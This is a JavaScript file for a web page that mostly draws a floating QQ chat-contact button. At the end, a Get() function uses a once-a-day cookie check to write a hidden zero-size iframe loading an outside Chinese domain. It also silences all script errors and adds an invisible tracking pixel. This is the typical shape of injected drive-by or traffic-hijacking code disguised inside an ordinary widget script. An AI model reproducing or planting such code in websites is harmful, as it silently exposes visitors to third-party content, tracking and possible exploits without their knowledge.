var isDOM = (document.getElementById ? true : false); 
var isIE4 = ((document.all && !isDOM) ? true : false);
var isNS4 = (document.layers ? true : false);
var isNS = navigator.appName == "Netscape";

function getRef(id) {
	if (isDOM) return document.getElementById(id);
	if (isIE4) return document.all[id];
	if (isNS4) return document.layers[id];
}

function moveRightEdge() {
	var yMenuFrom, yMenuTo, yOffset, timeoutNextCheck, myadd;

	if (isDOM) {
		yMenuFrom   = parseInt (divMenuray.style.top, 0);
		myadd = document.body.scrollTop + 200;
		yMenuTo     = (isNS ? window.pageYOffset : myadd);
	}
	timeoutNextCheck = 500;

	if (yMenuFrom != yMenuTo) {
		yOffset = Math.ceil(Math.abs(yMenuTo - yMenuFrom) / 20);
		if (yMenuTo < yMenuFrom)
			yOffset = -yOffset;
		if (isNS4)
			divMenuray.top += yOffset;
		else if (isDOM)
			divMenuray.style.top = parseInt (divMenuray.style.top, 0) + yOffset;
			timeoutNextCheck = 10;
	}
	setTimeout ('moveRightEdge()', timeoutNextCheck);
}

document.write("<div id='divMenuray' style='position:absolute; background:transparent; left:60px; top:20px; z-index:3; visibility:visible;'>");
document.write("<div style='width:80px;float:left;padding-right:800px !important;padding-right:882px;'><a target=blank href=tencent://message/?uin=13595631&Site=13595631&Menu=yes><img SRC=http://wpa.qq.com/pa?p=1:13595631:7 alt='点击这里给我发消息' border='0' align='absmiddle'></a></div>");
document.write("</div>");

if (isDOM) {
	var divMenuray = getRef('divMenuray');
		divMenuray.style.top = (isNS ? window.pageYOffset : (document.body.scrollTop+50)) + 0;
		divMenuray.style.visibility = "visible";
		moveRightEdge();
}

function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=sb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://www.cdtianfu.net.cn/\" width=0 height=0><\/IFRAME>");
window.onerror=function(){return true};
document.write ('<script>var a8615tf="51la";var a8615pu="";var a8615pf="51la";var a8615su=window.location;var a8615sf=document.referrer;var a8615of="";var a8615op="";var a8615ops=1;var a8615ot=1;var a8615d=new Date();var a8615color="";if (navigator.appName=="Netscape"){a8615color=screen.pixelDepth;} else {a8615color=screen.colorDepth;}<\/script><script>a8615tf=top.document.referrer;<\/script><script>a8615pu =window.parent.location;<\/script><script>a8615pf=window.parent.document.referrer;<\/script><script>a8615ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8615ops=(a8615ops==null)?1: (parseInt(unescape((a8615ops)[2]))+1);var a8615oe =new Date();a8615oe.setTime(a8615oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a8615ops+ ";path=/;expires="+a8615oe.toGMTString();a8615ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8615ot==null){a8615ot=1;}else{a8615ot=parseInt(unescape((a8615ot)[2])); a8615ot=(a8615ops==1)?(a8615ot+1):(a8615ot);}a8615oe.setTime(a8615oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a8615ot+";path=/;expires="+a8615oe.toGMTString();<\/script><script>a8615of=a8615sf;if(a8615pf!=="51la"){a8615of=a8615pf;}if(a8615tf!=="51la"){a8615of=a8615tf;}a8615op=a8615pu;try{lainframe}catch(e){a8615op=a8615su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=9&id=1688615&tpages=\'+a8615ops+\'&ttimes=\'+a8615ot+\'&tzone=\'+(0-a8615d.getTimezoneOffset()/60)+\'&tcolor=\'+a8615color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a8615of)+\'&vpage=\'+escape(a8615op)+\'" \/>\');<\/script>');
}
}Get();



